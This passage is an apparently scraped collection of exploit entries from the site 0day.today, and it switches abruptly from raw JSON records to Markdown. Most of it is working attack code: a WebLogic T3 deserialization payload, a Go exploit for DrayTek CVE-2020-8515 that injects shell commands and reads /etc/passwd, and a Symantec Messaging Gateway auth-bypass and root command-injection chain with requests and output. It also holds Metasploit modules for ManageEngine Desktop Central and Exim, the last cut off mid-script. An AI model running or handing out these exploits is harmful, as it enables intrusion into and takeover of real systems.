6\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\r\n \r\ntotallength = len(chunk1) + len(chunk2) + len(chunk3)\r\nprint \"[+]TOTAL payload length: \", totallength\r\n \r\n#Update the TOTAL payload length in Chunk1\r\nlen_hex = hex(totallength)\r\nprint \"[+]Payload length in HEX: \", len_hex\r\nlen_hex = 
len_hex.replace('0x', '0')\r\nprint \"[+]Payload length in HEX: \" , len_hex\r\n \r\ns1 = len_hex[:2]\r\ns2 = len_hex[2:4]\r\nlen_hex = unhexlify(s1 + s2)\r\n \r\nprint \"[+]Payload length in HEX now: \", len_hex\r\n \r\n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2)\r\nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\"\r\n \r\nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a
\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n#print \"[+]Updated 'chunk1' : \\n\", chunk1\r\n \r\n#Get the final payload. This should have appropriate TOTAL payload length in 'chunk1'\r\npayload = chunk1 + chunk2 + chunk3\r\n \r\n#Adjust header for appropriate message length\r\npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\r\nprint '[+]Sending payload...'\r\n#sendall() so the whole T3 message goes out even if send() would only write part of it\r\nsock.sendall(payload)\r\n \r\nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\"\r\nprint(\"\\n[+]Response to Request#: \\n\")\r\nresponse = sock.recv(15000)\r\nprint(response)\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28661", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-12-19T19:21:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-30T00:00:00", "type": "zdt", "title": "DrayTek Products - Pre-authentication Remote Root Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-03-30T00:00:00", "id": "1337DAY-ID-34170", "href": "https://0day.today/exploit/description/34170", "sourceData": "package main\n\n\n/*\nCVE-2020-8515: DrayTek pre-auth remote root RCE\nMon Mar 30 2020 - 0xsha.io\nAffected:\nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,\nand Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,\nand 1.4.4_Beta\nYou should upgrade as soon as possible to 1.5.1 firmware or later\nThis issue has been fixed in Vigor3900/2960/300B v1.5.1.\nread more :\nhttps://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html\nhttps://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\nhttps://thehackernews.com/2020/03/draytek-network-hacking.html\nhttps://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/\nexploiting using keyPath\nPOST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: 1.2.3.4\nContent-Length: 89\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n */\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"strings\"\n)\n\nfunc usage() {\n\n\tfmt.Println(\"CVE-2020-8515 exploit by @0xsha \")\n\tfmt.Println(\"Usage : \" + os.Args[0] + \" URL \" + \"command\" )\n\tfmt.Println(\"E.G : \" + os.Args[0] + \" http://1.2.3.4 \" + \"\\\"uname -a\\\"\" )\n}\n\nfunc main() {\n\n\n\tif len(os.Args) < 3 {\n\t\tusage()\n\t\tos.Exit(-1)\n\t}\n\n\ttargetUrl := os.Args[1]\n\t//cmd := \"cat /etc/passwd\"\n\tcmd := os.Args[2]\n\n\n\t// payload preparation\n\tvulnerableFile := \"/cgi-bin/mainfunction.cgi\"\n\t// specially crafted 
CMD\n\t// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n\tpayload :=`'\n\t/bin/sh -c 'CMD'\n\t'`\n\tpayload = strings.ReplaceAll(payload,\"CMD\", cmd)\n\tbypass := strings.ReplaceAll(payload,\" \", \"${IFS}\")\n\n\t//PostForm call url encoder internally\n\tresp, err := http.PostForm(targetUrl+vulnerableFile ,\n\t\turl.Values{\"action\": {\"login\"}, \"keyPath\": {bypass} , \"loginUser\": {\"a\"}, \"loginPwd\": {\"a\"} })\n\n\tif err != nil{\n\t\tfmt.Println(\"error connecting host\")\n\t\tos.Exit(-1)\n\t}\n\n\n\tdefer resp.Body.Close()\n\tbody, err := ioutil.ReadAll(resp.Body)\n\t\n\tif err != nil{\n\t\tfmt.Println(\"error reading data\")\n\t\tos.Exit(-1)\n\t}\n\t\n\tfmt.Println(string(body))\n\n}\n", "sourceHref": "https://0day.today/exploit/34170", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-04T21:32:34", "description": "Exploit for jsp platform in category web applications", "cvss3": {}, "published": "2017-08-19T00:00:00", "type": "zdt", "title": "Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6327"], "modified": "2017-08-19T00:00:00", "id": "1337DAY-ID-28326", "href": "https://0day.today/exploit/description/28326", "sourceData": "This is an advisory for CVE-2017-6327 which is an unauthenticated remote\r\ncode execution flaw in the web interface of Symantec Messaging Gateway\r\nprior to and including version 10.6.3-2, which can be used to execute\r\ncommands as root.\r\n \r\nSymantec Messaging Gateway, formerly known as Brightmail, is a linux-based\r\nanti-spam/security product for e-mail servers. 
It is deployed as a physical\r\ndevice or with ESX in close proximity to the servers it is designed to\r\nprotect.\r\n \r\n=*=*=*=*=*=*=*=*= TIMELINE\r\n \r\n2017-07-07: Reported to Symantec\r\n2017-08-10: Patch and notice released by Symantec [1]\r\n2017-08-18: Public technical advisory\r\n \r\n=*=*=*=*=*=*=*=*= DESCRIPTION\r\n \r\n- Bug #1: Web authentication bypass\r\n \r\nThe web management interface is available via HTTPS, and you can't do much\r\nwithout logging in.\r\n \r\nIf the current session (identified by the `JSESSIONID` cookie) has the\r\n`user` attribute set, the session is considered authenticated.\r\n \r\nThe file LoginAction.class defines a number of public methods and they can\r\nall be reached via unauthenticated web requests.\r\n \r\nBy making a GET request to `/brightmail/action1.do?method=method_name` we\r\ncan execute `LoginAction.method_name` if `method_name` is a public method.\r\n \r\nOne such public method which will be the target of our authentication\r\nbypass is called `LoginAction.notificationLogin`.\r\n \r\nIt does the following:\r\n \r\n1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt`\r\n2. Creates a new `UserTO` object using the decrypted `notify` parameter as\r\nan email value\r\n3. Creates a new session, invalidating the old one if necessary\r\n4. Sets the `user` attribute of the newly created session to our\r\nconstructed UserTO object\r\n \r\nIt essentially takes a username value from a GET parameter and logs you in\r\nas this user if it exists. If not, it creates this user for you.\r\n \r\nWe need to encrypt our `notify` argument so that\r\n`BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the\r\nencryption is just PBEWithMD5AndDES using a static password, conveniently\r\nincluded in the code itself. 
I won't include the encryption password or a\r\nfully encrypted notify string in this post.\r\n \r\n \r\nExample request:\r\n \r\nGET\r\n/brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test\r\nHTTP/1.1\r\n...\r\n \r\n \r\nHTTP/1.1 302 Found\r\nServer: Apache-Coyote/1.1\r\n...\r\nSet-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail;\r\nSecure; HttpOnly\r\n \r\n \r\n- Bug #2: Command injection\r\n \r\nThe RestoreAction.performRestore method can be reached with an\r\nauthenticated session and it takes the restoreSource and\r\nlocalBackupFilename parameters.\r\n \r\nAfter a long chain of function calls, localBackupFilename ends up being\r\nsent to the local \"bmagent\" daemon listening on port 41002. It will execute\r\n/opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied\r\nvalue.\r\n \r\nThe db-restore script is a sudo wrapper for\r\n/opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl\r\nscript containing a command injection in a call to /usr/bin/du.\r\n \r\n$ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;\"`id`\";'\r\n/usr/bin/du: cannot access `/data/backups/asdf': No such file or directory\r\nsh: uid=0(root) gid=0(root) groups=0(root): command not found\r\nERROR: Failed to copy 'asdf;\"`id`\";' from local backup store: No such file\r\nor directory\r\n \r\n \r\nThis command injection can be exploited from the web management interface\r\nwith a valid session, which we can create using bug #1.\r\n \r\n- Combining bug #1 and #2\r\n \r\nThe last step is to get a CSRF token since the vulnerable performRestore\r\nfunction is annotated with @CSRF.\r\n \r\nAfter some quick digging it turns out that all you need to do is call\r\n/brightmail/common.jsp to get a token that will be valid for all your\r\nrequests.\r\n \r\nThe URL-encoded value we provide for the `localBackupFileSelection`\r\nparameter 
is:\r\nasdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname\r\n-a>>/data/bcc/webapps/brightmail/output.txt`hehehe\r\n \r\nRequest:\r\n \r\nGET\r\n/brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65\r\nHTTP/1.1\r\nHost: 192.168.205.220\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)\r\nGecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nCookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\nResponse:\r\n \r\nHTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nCache-Control: no-store,no-cache\r\nPragma: no-cache\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Type: text/html;charset=UTF-8\r\nContent-Length: 803\r\nDate: Thu, 29 Jun 2017 06:48:12 GMT\r\nConnection: close\r\n \r\n<HTML>\r\n<title>Symantec Messaging Gateway -&nbps;Restore</title>\r\n...\r\n \r\n \r\nNow to confirm that our command output was correctly placed in a file\r\ninside the webroot.\r\n \r\nimac:~% curl -k https://192.168.205.220/brightmail/output.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\nLinux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13\r\n22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n \r\n=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT\r\n \r\nimac:~/brightmail% python brightmail-rce.py\r\nhttps://192.168.205.220/brightmail\r\nbypassing login..\r\n* 
JSESSIONID=693079639299816F80016123BE8A0167
verifying login bypass..
* Version: 10.6.3
getting csrf token..
* 1e35af8c567d3448a65c8516a835cec30b6b8b73
done, verifying..

uid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root)
groups=0(root),99(nobody),499(mysql),502(bcc)
Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

# cat /etc/issue

Symantec Messaging Gateway
Version 10.6.3-2
Copyright (c) 1998-2017 Symantec Corporation. All rights reserved.

=*=*=*=*=*=*=*=*= REFERENCES

[1] https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00

=*=*=*=*=*=*=*=*= CREDIT

Philip Pettersson

# 0day.today [2018-04-04] #

- Source: https://0day.today/exploit/28326
- CVSS v2: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)

**ManageEngine Desktop Central Java Deserialization Exploit** (0day.today, ID 1337DAY-ID-34095, published 2020-03-15)

- CVE: CVE-2020-10189
- CVSS v3.1: 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- Source: https://0day.today/exploit/34095

This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ManageEngine Desktop Central Java Deserialization',
      'Description' => %q{
        This module exploits a Java deserialization vulnerability in the
        getChartImage() method from the FileStorage class within ManageEngine
        Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.

        "The short-term fix for the arbitrary file upload vulnerability was
        released in build 10.0.474 on January 20, 2020. In continuation of that,
        the complete fix for the remote code execution vulnerability is now
        available in build 10.0.479."
      },
      'Author' => [
        'mr_me', # Discovery and exploit
        'wvu'    # Module
      ],
      'References' => [
        ['CVE', '2020-10189'],
        ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
        ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
        ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
        ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
      ],
      'DisclosureDate' => '2020-03-05', # 0day release
      'License' => MSF_LICENSE,
      'Platform' => 'windows',
      'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged' => true,
      'Targets' => [
        ['Windows Command',
          'Arch' => ARCH_CMD,
          'Type' => :win_cmd
        ],
        ['Windows Dropper',
          'Arch' => [ARCH_X86, ARCH_X64],
          'Type' => :win_dropper
        ],
        ['PowerShell Stager',
          'Arch' => [ARCH_X86, ARCH_X64],
          'Type' => :psh_stager
        ]
      ],
      'DefaultTarget' => 2,
      'DefaultOptions' => {
        'RPORT' => 8383,
        'SSL' => true,
        'WfsDelay' => 60 # It can take a little while to trigger
      },
      'CmdStagerFlavor' => 'certutil', # This works without issue
      'Notes' => {
        'PatchedVersion' => Gem::Version.new('100474'),
        'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?
        'Reliability' => [FIRST_ATTEMPT_FAIL],  # Payload upload may fail
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'configurations.do')
    )

    unless res
      return CheckCode::Unknown('Target is not responding to check')
    end

    unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')
      return CheckCode::Unknown('Target is not running Desktop Central')
    end

    version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text

    unless version
      return CheckCode::Detected('Could not detect Desktop Central version')
    end

    vprint_status("Detected Desktop Central version #{version}")

    if Gem::Version.new(version) < notes['PatchedVersion']
      return CheckCode::Appears("#{version} is an exploitable version")
    end

    CheckCode::Safe("#{version} is not an exploitable version")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :win_cmd
      execute_command(payload.encoded)
    when :win_dropper
      execute_cmdstager
    when :psh_stager
      execute_command(cmd_psh_payload(
        payload.encoded,
        payload.arch.first,
        remove_comspec: true
      ))
    end
  end

  def execute_command(cmd, _opts = {})
    # XXX: An executable is required to run arbitrary commands
    cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper

    vprint_status("Serializing command: #{cmd}")

    # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
    serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(
      'CommonsBeanutils1',
      cmd
    )

    # XXX: Patch in expected serialVersionUID
    serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"

    # Rock 'n' roll!
    upload_serialized_payload(serialized_payload)
    deserialize_payload
  end

  def upload_serialized_payload(serialized_payload)
    print_status('Uploading serialized payload')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,
                             '/mdm/client/v1/mdmLogUploader'),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'udid' => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
        'filename' => 'logger.zip'
      },
      'data' => serialized_payload
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')
    end

    print_good('Successfully uploaded serialized payload')

    # C:\Program Files\DesktopCentral_Server\bin
    register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
  end

  def deserialize_payload
    print_status('Deserializing payload')

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'cewolf/'),
      'vars_get' => {'img' => '\\logger.zip'}
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')
    end

    print_good('Successfully deserialized payload')
  end

end
```

**Exim 4.87 / 4.91 - Local Privilege Escalation Exploit** (0day.today, ID 1337DAY-ID-33150, published 2019-08-23)

- CVE: CVE-2019-10149
- CVSS v3.0: 9.8 Critical (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- Source: https://0day.today/exploit/33150

This Metasploit module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of the recipient address in the deliver_message() function in /src/deliver.c may lead to command execution with root privileges.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'expect'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',
      'Description' => %q{
        This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
        Improper validation of recipient address in deliver_message()
        function in /src/deliver.c may lead to command execution with root privileges
        (CVE-2019-10149).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Qualys',           # Discovery and PoC (@qualys)
          'Dennis Herrmann',  # Working exploit (@dhn)
          'Marco Ivaldi',     # Working exploit (@0xdea)
          'Guillaume André'   # Metasploit module (@yaumn_)
        ],
      'DisclosureDate' => '2019-06-05',
      'Platform' => [ 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      'Targets' =>
        [
          [
            'Exim 4.87 - 4.91',
            lower_version: Gem::Version.new('4.87'),
            upper_version: Gem::Version.new('4.91')
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependSetgid' => true,
          'PrependSetuid' => true
        },
      'References' =>
        [
          [ 'CVE', '2019-10149' ],
          [ 'EDB', '46996' ],
          [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
        ]
    ))

    register_options(
      [
        OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
      ])

    register_advanced_options(
      [
        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
        OptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]),
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  # Hex-escape every byte so the command survives Exim's address parsing
  def encode_command(cmd)
    '\x' + cmd.unpack('H2' * cmd.length).join('\x')
  end

  def open_tcp_connection
    socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
    params = Rex::Socket::Parameters.new({
      'PeerHost' => '127.0.0.1',
      'PeerPort' => datastore['EXIMPORT']
    })
    begin
      socket = socket_subsystem.create_tcp_client_channel(params)
    rescue => e
      vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
                   "are you sure exim is listening on this port? (see EXIMPORT)")
      raise e
    end
    return socket_subsystem, socket
  end

  def inject_payload(payload)
    if session.type == 'meterpreter'
      socket_subsystem, socket = open_tcp_connection

      tcp_conversation = {
        nil => /220/,
        'helo localhost' => /250/,
        "MAIL FROM:<>" => /250/,
        "RCPT TO:<${run{#{payload}}}@localhost>" => /250/,
        'DATA' => /354/,
        'Received:' => nil,
        '.' => /250/
      }

      begin
        tcp_conversation.each do |line, pattern|
          Timeout.timeout(datastore['SendExpectTimeout']) do
            if line
              if line == 'Received:'
                for i in (1..31)
                  socket.puts("#{line} #{i}\n")
                end
              else
                socket.puts("#{line}\n")
              end
            end
            if pattern
              socket.expect(pattern)
            end
          end
        end
      rescue Rex::ConnectionError => e
        fail_with(Failure::Unreachable, e.message)
      rescue Timeout::Error
        fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')
      ensure
        socket.puts("QUIT\n")
        socket.close
        socket_subsystem.shutdown
      end
    else
      unless cmd_exec("/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' "\
                      "&& echo true").chomp.to_s == 'true'
        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
      end

      bash_script = %|
        #!/bin/bash

        exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
        read -u 3 && echo $REPLY
        echo "helo localhost" >&3
        read -u 3 && echo $REPLY
        echo "mail from:<>" >&3
        read -u 3 && echo $REPLY
        echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3
        read -u 3 && echo $REPLY
        echo "data" >&3
